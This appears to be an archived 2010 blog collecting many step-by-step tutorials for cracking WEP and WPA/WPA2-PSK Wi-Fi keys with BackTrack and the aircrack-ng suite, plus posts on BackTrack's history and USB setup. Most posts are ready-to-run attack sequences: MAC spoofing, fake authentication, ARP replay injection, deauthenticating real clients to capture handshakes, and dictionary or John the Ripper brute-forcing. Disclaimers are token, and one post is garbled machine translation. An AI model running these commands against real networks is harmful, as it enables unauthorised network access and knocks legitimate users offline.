Kluwan Backtrack

How to WPA Crack

2010-05-13T11:41:00.000-07:00

Differences

WPA is an encryption algorithm that takes care of a lot of the vunerablities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different.
A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

WPA Flavours

WPA basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.
PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved, for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key but upon the initialization of the TKIP, like during an authentication, we get the password (well the PMK anyways). A robust dictionary attack will take care of a lot of consumer passwords.
Radius involves physical transferring of the key and encrypted channels blah blah blah, look it up to learn more about it but 90% of commerical APs do not support it, it is more of an enterprise solution then a consumer one.

The Handshake

The WPA handshake was designed to occur over insecure channels and in plaintext so the password is not actually sent across. There are some fancy dancy algorithms in the background that turn it into a primary master key, PMK, and the like but none of that really matters cause the PMK is enough to connect to the network.
The only step we need to do is capture a full authenication handshake from a real client and the AP. This can prove tricky without some packet injection, but if you are lucky to capture a full handshake, then you can leave and do the rest of the cracking at home.
We can force an authenication handshake by launching a Deauthentication Attack, but only if there is a real client already connected (you can tell in airodump). If there are no connected clients, you're outta luck.
Like for WEP, we want to know the channel the WPA is sitting on, but the airodump command is slightly different. We don't want just IVs so we don't specify an IV flag. This will produce "lucid.cap" instead of "lucid.ivs". Assume WPA is on channel 6 and wireless interface is ath0.

./airodump ath0 lucid 6

Dictionary Brute Force

The most important part of brute forcing a WPA password is a good dictionary. Check out http://www.openwall.com/wordlists/ for a 'really' good one. It costs money, but its the biggest and best I've ever seen (40 Million words, no duplicates, one .txt file). There is also a free reduced version from the same site but i'm sure resourceful people can figure out where to get a good dictionary from.
When you have a good dictionary the crack is a simple brute force attack:

./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist

Either you'll get it or you won't... depends on the strength of the password and if a dictionary attack can crack it.

Using Aireplay

Aireplay is the fun part. You get to manipulate packets to trick the network into giving you what you want.

WEP Attacks

Attacks used to create more traffic on WEP networks to get more IVs.

ARP Injection

ARP Replay is a classic way of getting more IV traffic from the AP. It is the turtle. Slow but steady and almost always works. We need the BSSID of the AP and the BSSID of an associated client. If there are no clients connected, it is possible to create one with another WEP attack explained below: Fake Authentication Attack.
With airodump listening, we attack:

./aireplay -3 -b  -h  ath0

Note: The -3 specifys the type of attack (3=ARP Replay).
This will continue to run, and airodump, listening fron another terminal, will pick up any reply IVs.

Interactive Packet Replay

Interactive Packet Reply is quite a bit more advanced and requires capturing packets and constructing your own. It can prove more effective then simple ARP requests but I won't get into packet construction here.
A useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV). Some APs do, some don't.

aireplay -2 -b  -h  -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

Fake Authentication Attack

This attack won't generate any more traffic but it does create an associative client MAC Address useful for the above two attacks. Its definately not as good as having a real, connected client, but you gots to do what you gots to do.
This is done easiest with another machine because we need a new MAC address but if you can manually change your MAC then that'll work too. We'll call your new MAC address "Fake MAC".
Now most APs need clients to reassociate every 30 seconds or so or they think they're disconnected. This is pretty arbitrary but I use it and it has worked but if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.

./aireplay -1 30 -e '' -a  -h  ath0

If successful, you should see something like this:

23:47:29  Sending Authentication Request
 23:47:29  Authentication successful
 23:47:30  Sending Association Request
 23:47:30  Association successful :-)

Awesome! Now you can use the above two attacks even though there were no clients connected in the first place! If it fails, there may be MAC Address Filtering on so if you really want to use this, you'll have to sniff around until a client provides you with a registered MAC to fake.

WPA Attacks

So far, the only way to really crack WPA is to force a re-authentication of a valid client. We need a real, actively connected client to break WPA. You might have to wait a while.

Deauthentication Attack

This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:

aireplay -0 5 -a  -c  ath0

After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.

Conclusion

Well thats that. APs crack fairly often but sometimes there is just nothing you can do. Obviously you are not allowed to illegally crack other people's wireless connections, this is purely for penetration testing purposes and some fun.

How to WEP Crack

2010-05-13T11:37:00.000-07:00

Theory

A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection.
A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.
Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition.
A couple of things will cause us some problems.

If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key.
Theres no traffic, therefore no packets - we can fix this.
MAC Address Filtering - we can fix this too.

Setting up your tools

We're gonna need 3 or 4 shells open, we have 5 tools:

airodump - Grabbing IVs
aircrack - Cracking the IVs
airdecap - Decoding captured packets
airreplay - (My Favourite) Packet injector to attack APs.
kismet - Network Sniffer, can grab IVs as well.

For a standard WEP hack we'll usally only need airodump, aircrack, and kismet (server and client). If we run into some problems we might have to use airreplay to fiddle about.
I'll leave you to config all these tools up, for the most part they should just be defaults with the exception of kismet.

Finding the Network

First step is we need to find a netork to crack. Start up kismet and start sniffing for APs. Leave it on for a bit so that it can discover all the important information about the networks around. What we want from kismet is:

Encryption type: Is it WEP 64-bit? 128-bit?
What channel is it on? Can greatly speed up IV collection.
AP's IP Address
BSSID
ESSID

All this info isn't required but the more you have, the more options you have later to crack and sniff. We can get a lot of this from airodump as well but I find the channel is important.

Capturing IVs

Alright, we know what we wanna crack, so lets start capturing packets. You can use kismet to capture files but I prefer airodump because it keeps a running count of all the IVs I've captured and I can crack and airodump will automatically update aircrack with new IVs as it finds them.
Note: kimset can interfere with airodump so make sure you close it down before starting airodump.
Airodump is pretty straight forward with its command line looking something like this:

./airodump   [channel] [IVs flag]

interface is your wireless interface to use - required.
output prefix is just the filname it'll prepend, - required.
channel is the specific channel we'll scan, leave blank or use 0 to channel hop.
IVs flag is either 0 or 1, depending on whether you want all packets logged, or just IVs.

My wireless card is ath0, output prefix i'll use "lucid", the channel we sniffed from kismet is 6, and IVs flag is 1 because we just want IVs. So we run:

./airodump ath0 lucid 6 1

Airodump will come up with a graph showing us all the APs and their relevant info, as well as client stations connected to any of the APs.

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
 
 00:23:1F:55:04:BC   76    21995   213416   6  54. WEP   hackme 
 
 BSSID              STATION            PWR  Packets  Probes
 
 00:23:1F:55:04:BC  00:12:5B:4C:23:27  112     8202  hackme
 00:23:1F:55:04:BC  00:12:5B:DA:2F:6A   21     1721  hackme

The second line shows us some info about the AP as well as the number of beacons and data packets we've collected from the AP. The two last lines show us two authenticated clients. Where they are connected to and the packets they are sending. We won't use this client info in a straight theory hack but in practice we'll need this info to actively attack the AP.
This step may take a long time or could be very short. It depends how busy the AP is and how many IVs we are collecting. What we are doing is populating a file "lucid.ivs" with all the IV important packet info. Next, we'll feed this to aircrack. To move onto the next step, we'll want at least 100,000 packets (under # Data in airodump) but probably more.

Using IVs to Decrypt the Key

Ok, pretend you have enough IVs now to attempt a crack. Goto a new terminal (without stopping airodump - remember it'll autoupdate as new IVs are found) and we'll start aircrack. It looks something like this:

./aircrack [options]

There are a lot of options so you can look them up yourself, i'll be using common ones here that should get you a crack. Our input file is "lucid.ivs", the options we will use are:

-a 1 : forces a WEP attack mode (2 forces WPA)
either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique.
-n 64 or -n 128 : WEP key length, omit if not known by now.

So our command will look like:

./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs

and off it goes, resembling the picture from the top. Keep an eye on the Unique IV count as it should increase if airodump is still running. For all intents and purposes you are done. That'll pop open most old wireless routers with some traffic on them.

Anticipated Problems

There are lots of problems that can come up that will make the above fail, or work very slowly.

No traffic
- No traffic is being passed, therefore you can't capture any IVs.
- What we need to do is inject some special packets to trick the AP into broadcasting.
- Covered below in WEP Attacks
MAC Address filtering
- AP is only responding to connected clients. Probably because MAC address filtering is on.
- Using airodumps screen you can find the MAC address of authenticated users so just change your MAC to theirs and continue on.
- Using the -m option you can specify aircrack to filter packets by MAC Address, ex. -m 00:12:5B:4C:23:27
Can't Crack even with tons of IVs
- Some of the statistical attacks can create false positives and lead you in the wrong direction.
- Try using -k N (where N=1..17) or -y to vary your attack method.
- Increase the fudge factor. By default it is at 2, by specifying -f N (where N>=2) will increase your chances of a crack, but take much longer. I find that doubling the previous fudge factor is a nice progression if you are having trouble.
Still Nothing
- Find the AP by following the signal strength and ask the admin what the WEP key is.

How to Crack WEP Keys on Backtrack

2010-04-23T22:17:00.001-07:00

Allright now you should be in Backtrack the desktop should be all loaded and you should be ready to start cracking those WEP Keys.
1. First you must click on the Terminal icon in the bottom toolbar it looks like a black TV.
2. Now you must type in airmon-ng the command will display a card name which you will need to remember and substitute for the “eth1″.
3. Now type airmon-ng stop “eth1″.
4.Now type ifconfig “eth1″ down
5.Now type macchanger –mac 00:11:22:33:44:55 “eth1″
6.Now type airmon-ng start “eth1″
7.Now type airodump-ng “eth1″
*You need to note the Channel, The BSSID, and the ESSID to crack.*
8.Now type airodump-ng -c “whatever channel” -w “whateverfilenameuwant” –BSSID “whateverbssid” “eth1″
*Make sure that you leave this window open so run a new Terminal.*
9.aireplay-ng -1 0 -a “bssid” -h 00:11:22:33:44:55 “eth1″
*Leave this windows open.*
10.aireplay-ng -3 -b “bssid -h 00:11:22:33:44:55 “eth1″
*Leave this window open.*
11. Now go back and wait for the Data to hit 1000 IVS than run the next command.
*This is for a 32 bit WEP.*
11.aircrack-ng -b “bssid” “whateverfilename”.
The key that is displayed

How to crack wpa - psk

2010-04-23T16:13:00.000-07:00

As I mentioned in a previous blog, my team is working on a project where we perform a Man-in-the-Middle (MitM) attack on a WEP encrypted wireless network. The point of the project is to demonstrate how quick and easy it is to hack a WEP encrypted wireless network and to discuss and encourage additional methods of wireless security.

As I searched for useful hack tools I became especially excited about Aircrack. Aircrack is a package of great wireless auditing tools. It includes:

Airodump: 802.11 packet capture program
Aireplay: 802.11 packet injection program
Aircrack: static WEP and WPA-PSK key cracker
Airdecap: decrypts WEP/WPA capture file

The amount of time it takes to hack an encrypted wireless network is dependent on the amount of traffic. Less traffic means the hack will take more time and vise versa. That's why the Aireplay tool is so exciting. It is basically a traffic generator, which enables the hacker to up the networks traffic level, thus speeding up the hack.

The other tools that caught my interest are Aircrack and Airdecap because they work for both WEP and WPA encryption, which in my experience thus far hacking tools are typically limited to WEP.

All IT/Tech geeks know that WEP can be cracked with relative ease, but what is not as well know is how quick/easy it is to crack WPA-PSK encrypted network. Since the tool exists we've decided to expand our scope to cracking a WPA-PSK encrypted network rather then a WEP encrypted network.

Now all of my comments on Aircrack thus far are only based on research. Hopefully we will be able to play with these tools tonight and find out how well they work. I will be sure to give a review of the package once we've finished our work.

If anyone has experience with this package I welcome your comments/lessons learned.
Source : http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730

BackTrack History

2010-04-22T17:46:00.000-07:00

The BackTrack distribution originated from the Linux counterparts WHAX and Max Moser's Auditor Security Collection - "The Swiss Army Knife for security assessments". Both where focused on Linux-based penetration tests.
While WHAX was packed with more features, Auditor was based on structure and stability. Auditor featured well-laid-out menus for its collection of over 300 tools for troubleshooting, network and systems-fortifying. Its user-friendliness resulted in enhanced usability for penetration testing which led to the formulation of the BackTrack security testing distribution. The Auditor Security Collection was a Live CD based on Knoppix.
WHAX, a name derived from White-Hat and SLAX, was a distribution designed for security tasks. WHAX emerged from Whoppix, a Knoppix-based security distro. When Whoppix reached version 3.0 it was renamed as WHAX, to reflect the change of parent distribution from Knoppix to SLAX. Customized by Mati Aharoni, a security consultant, WHAX made its central focus on penetration testing. WHAX made it possible to test and verify the security of a network from many computers located in various places.
The first real BackTrack release was available to the public in the early 2007. It was a major step in advance compared to all the other security penetration testing distros available. Through the years and the releases the distro became the standard as penetration testing toolkit all over the world. Major companies like SANS or even the FBI where using the CD-ROM as base for their work. The demand for such a tool-suite was immense. Release "pre-4" has been downloaded over 4'000'000 times. The IRC channels and also the E-Mail and Forum entries became larger and lager. The community became so big that Backtrack needed a lot of help from the community.
Now at the early 2010 BackTrack encounters again a major change......

Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu

2010-04-21T17:38:00.000-07:00

Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.

Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.

Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu

sudo apt-get install aircrack-ng

Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)

Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada

sudo su

ifconfig -a

Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0

ifconfig wlan0 up

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.

airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.

airodump-ng mon0

cat : mon0 adalah interface virtual hasil dari airmon-ng tadi

Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.

airodump-ng -w coba –channel 11 –bssid 001122334455 mon0

ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’

Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking

aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0

ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth

Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt

ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt

Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat pengetahuan yang belum tau aja. Selamat mencoba

Tutorial WPA crack with Backtrack 3

2010-04-09T06:34:00.000-07:00

This Video demonstrates WPA cracking using dictionary based brute force, all tools used in demonstration are available in Backtrack3.

Backtrack is a security penetration testing live open source Linux distro, Backtrack took two of the best, Whax and Auditor and merged them to make one meaningful distro that emerged as an ethical hackers best choice for security auditing. It comes loaded with tools including network mapping, Info gathering, vulnerability Identification tools, and even some for Bluetooth hacking.
Commands Used in video (Step by Step):
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger –mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid)wlan0
8)aircrack-ng (filename-01.cap)-w (dictionary location)

Backtrack can be downloaded from here

How To Crack A Wi-Fi Network’s WEP Password

2010-03-19T03:46:00.000-07:00

First run the following to get a list of your network interfaces: airmon-ng

The only one I’ve got there is labelled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger –mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

If you don’t get the same results from these commands as pictured here, most likely your network adaptor won’t work with this particular crack. If you do, you’ve successfully “faked” a new MAC address on your network interface, 00:11:22:33:44:55.
Now it’s time to pick your network. Run:

airodump-ng (interface)

To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labelled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you’ve got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.
Now we’re going to watch what’s going on with that network you chose and capture that information to a file. Run:

airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo", which is the name of the network name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point’s SSID name, which in my case is yoyo. What you want to get after this command is the reassuring “Association successful” message with that smiley face.

You’re almost there. Now it’s time for:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we’re creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here’s the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the “#Data” column—you want it to go above 10,000. (Pictured below it’s only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adaptor), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won’t work if it doesn’t. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you’ve collected enough data, it’s the moment of truth. Launch a third Konsole window and run the following to crack that data you’ve collected:

aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it’s the one with .cap as the extension.
If you didn’t get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:
The WEP key appears next to “KEY FOUND.” Drop the colons and enter it to log onto the network.

Problems Along the Way

With this article I set out to prove that cracking WEP is a relatively “easy” process for someone determined and willing to get the hardware and software going. I still think that’s true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you’ll notice that the last screenshot up there doesn’t look like the others—it’s because it’s not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven’t captured enough data for aircrack to decrypt the key.http://www.lifehacker.com.au/2009/07/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack/

Back Track 4 on USB with persistent changes – bootable BT4 USB stick

2010-02-19T03:55:00.000-08:00

If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To:
“Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).

To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.

Well, when you finish Step 5 you will need to follow the instructions below:

Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:

    mount /dev/sdc2 /mnt/sdc2
    cd /mnt/sdc2
    mkdir changes

Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:

    cd /boot/syslinux
    chmod +Xx lilo
    chmod +Xx syslinux

Then you need to open syslinux.cfg and modify it. To do that execute the commands:

    cd /mnt/sdc1/boot/syslinux
    kwrite syslinux.cfg

I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:

1. “LABEL BT4″

2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.

3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.

4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.

5. Save your changes and exit the editor.

That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.

Tips and Trick Using Backtrack with Virtual Box

2010-02-16T04:17:00.000-08:00

Hi Guest, verry simple to use backtrack verry good with virtual box.
Step one download Backtrack, step two download Virtual Box. All is free and how to using your search in the youtube.
Good luck !

Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

2010-02-13T04:53:00.000-08:00

Basic steps :

Put interface in monitor mode
Find wireless network (protected with WPA2 and a Pre Shared Key)
Capture all packets
Wait until you see a client and deauthenticate the client, so the handshake can be captured
Crack the key using a dictionary file (or via John The Ripper)

I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.
First, put the card in monitor mode :

root@bt:~# airmon-ng 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.
That’s it
Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :
8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.

Here's how to get the WEP key (WEP-based wireless password)

2010-02-12T08:33:00.000-08:00

Here's how to get the WEP key (WEP-based wireless password)

Without bsa stale well, to the point ... First prepare the equipment used to ...
1) laptop, let me take him lightly.
2) wireless adapter okay with chipset supports the ability to walk dl monitor mode and perform packet injection. Dl it can use a wireless adapter, dg dr atheros chipset.
3) To perform this attack, I recommend using Linux OS. more precisely backtrack min v 3.0 (ato v 2.0 + dr jasakom). can be downloaded at http://remote-exploit.org
Cracking the WEP Key dg backtrack (klu bs, mudeng little comand2 in backtrack ttg ^ _ ^)
> run konsole 1

1) Make sure you use a wireless adapter is recommended reply. to see command airmon dg bs-ng and to see the detail use the command iwconfig
2) Now it's time to order a wireless scanner
airodump-ng ath0. This command requested that airodump-ng to see all the data packets via adapter ath0. Then you will get the wireless information in hack-be.
3) Stelah set goals for mlakukan wireless network cracking, skarang time to collect as much data the network dr to be on-crack dg statistical methods. The command
airodump-ng - channel 1 - BSSID 00:18:39:39:23:66-w results ath0
- channel 1 (dg adjust the target channel sample channel 1)
- BSSID (BSSID sesuaikn dg jg yg seen as a target a second way).

> run konsole 2
4) Helping create the data packet
command,,,
aireplay-ng - arpreplay-b 00:18:39:39:23:66-h 00:18: DE: C3: D8: 68 ath0

-b 00:18:39:39:23:66 (condition BSSID / MAC address of AP)
-h 00:18: DE: C3: D8: 68 (MAC address of the client kompie dr yg dg connected sdang AP)

> run konsole 3
5) Direct PTW method. crack the WEP key based on the collected data packets. with command
aircrack-PTW-01.cap results

- Order the results-01 comes from the name file is used for storing sets of data packets. ( step 3)
-. Seal the file type "result" requisite dl this WEP key cracking.

6) Wait patiently until the process stops dah 3 console shows "KEY FOUND! [...................]"
7) Use it wisely, okey
Best successful yes,,,,good luck.

Wi-Fi Hacking – Crack WEP

2010-02-07T19:38:00.000-08:00

To crack WEP at this time, Me using BackTrack OS. Let’s go, open some consoles:
airmon-ng ==> adapter list
airmon-ng stop ath0 ==> destroy adapter virtual
airmon-ng stop ath1 ==> destroy adapter virtual
airmon-ng start wifi0 ==> create new adapter virtual
Console 1:
airodump-ng ath0 ==> scanning
airodump-ng –channel CHANNEL_NUMBER –bssid MAC_AP -w FILE_NAME_SAVE ath0 ==> Capture information
Console 2:
aireplay-ng –arpreplay -b MAC_AP -h MAC_CLIENT ath0 ==> help capture information with arp attack
Console 3:
aireplay-ng –deauth 2 -c MAC_CLIENT -a MAC_AP ath0 ==> help capture information with deauth
While capture information, get the packet as far as u can because that very important to crack WEP.
Final:
aircrack-ng FILE_NAME_SAVE*.cap ==> Cracking
Wait and see the passphrase.
done.
Good Luck…

Wi-Fi Hacking – Crack WPA

2010-02-07T19:36:00.000-08:00

Still using BackTrack OS. Step by step :

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c CHANNEL_NUMBER -w FILE_NAME –bssid MAC_AP ath0 [Wait until shakehand packet captured]
aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT ath0
aircrack-ng -w FILE_WORD_LIST -b MAC_AP FILE_NAME*.cap
